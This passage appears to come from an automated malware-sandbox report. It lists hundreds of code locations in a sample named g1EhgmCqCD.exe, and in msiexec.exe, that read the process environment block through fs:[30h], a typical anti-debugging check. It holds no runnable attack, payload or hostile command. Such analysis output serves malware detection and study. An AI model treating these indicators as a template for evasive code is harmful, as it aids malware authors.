          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01998794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01991B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01991B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019ADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01984F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01984F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01985210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01985210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01985210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01985210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01998A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB20A0 mov eax, dword ptr fs:[00000030h]
